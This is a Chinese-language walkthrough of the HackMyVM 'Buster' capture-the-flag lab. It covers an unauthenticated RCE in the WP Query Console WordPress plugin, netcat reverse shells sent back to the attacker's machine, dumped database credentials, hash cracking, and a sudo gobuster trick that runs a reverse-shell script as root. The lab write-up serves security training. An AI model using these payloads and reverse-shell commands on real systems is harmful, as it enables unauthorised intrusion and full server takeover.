hackmyvm | Buster靶场

这一关常规的信息收集都没有什么突破点，只能从他的的框架去寻找Nday

一眼wordpress框架

使用wpscan工具进行扫描

wpscan --url http://192.168.94.8/ --api-token=srfNAJgHUPbK7OJh6Tjp00a5LUjFbs******* -e ap --plugins-detection aggressive

[+] wp-query-console | Location: http://192.168.94.8/wp-content/plugins/wp-query-console/ | Latest Version: 1.0 (up to date) | Last Updated: 2018-03-16T16:03:00.000Z | Readme: http://192.168.94.8/wp-content/plugins/wp-query-console/README.txt | | Found By: Known Locations (Aggressive Detection) |  - http://192.168.94.8/wp-content/plugins/wp-query-console/, status: 403 | | [!] 1 vulnerability identified: | | [!] Title: WP Query Console <= 1.0 - Unauthenticated Remote Code Execution |     References: |      - https://wpscan.com/vulnerability/f911568d-5f79-49b7-8ce4-fa0da3183214 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-50498 |      - https://www.wordfence.com/threat-intel/vulnerabilities/id/ae07ca12-e827-43f9-8cbb-275b9abbd4c3 | | Version: 1.0 (80% confidence) | Found By: Readme - Stable Tag (Aggressive Detection) |  - http://192.168.94.8/wp-content/plugins/wp-query-console/README.txt

WordPress的WP查询控制台插件易于在所有版本中，包括1.0的所有版本中执行远程代码。这使得未经验证的攻击者可以在服务器上执行代码。

POST /wp-json/wqc/v1/query HTTP/1.1Host: 192.168.94.8User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brReferer: http://kubernetes.docker.internal/wp-admin/admin.php?page=wp-query-consoleContent-Type: application/jsonContent-Length: 45Origin: http://kubernetes.docker.internalConnection: keep-alivePriority: u=0{"queryArgs":"phpinfo();","queryType":"post"}

响应

过滤的函数

<tr><td class="e">disable_functions</td>    <td class="v">passthru,exec,system,popen,chroot,scandir,chgrp,chown,escapesh</td></tr>

他是无回显的命令注入

用shell_exec(ping -c2 192.168.94.4)

反弹shell

shell_exec('nc -e /bin/bash 192.168.94.4 6666')nc -vlp 6666

美化shell

python -c "import pty; pty.spawn('/bin/bash')"

查看wordpress配置文件

cat wp-config.php

/** Database username */define( 'DB_USER', 'll104567' );/** Database password */define( 'DB_PASSWORD', 'thehandsomeguy' );

连接数据库

mysql -u ll104567 -p

查看wp-user里面的用户

john破解哈希

密码

104567

用ssh去连接

ssh [email protected]

拿到第一个user标志

sudo -l

Matching Defaults entries for welcome on listen:    env_reset, mail_badpass,    secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/binUser welcome may run the following commands on listen:    (ALL) NOPASSWD: /usr/bin/gobuster

Matching Defaults entries for welcome on listen:    env_reset, mail_badpass,    secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/binUser welcome may run the following commands on listen:    (ALL) NOPASSWD: /usr/bin/gobuster

可以用gobuster

服务器

echo'nc -e /bin/bash 192.168.94.4 8866' > bchmod +x becho'tmp/b' > a.txtsudo gobuster -w a.txt -u http://192.168.94.4:8000 -n -q -o /opt/.test.sh

本地

cd ~mkdir tmpcd tmptouch bpython -m http.server

再开nc反弹shell

nc -vlp

最后拿到root权限！！！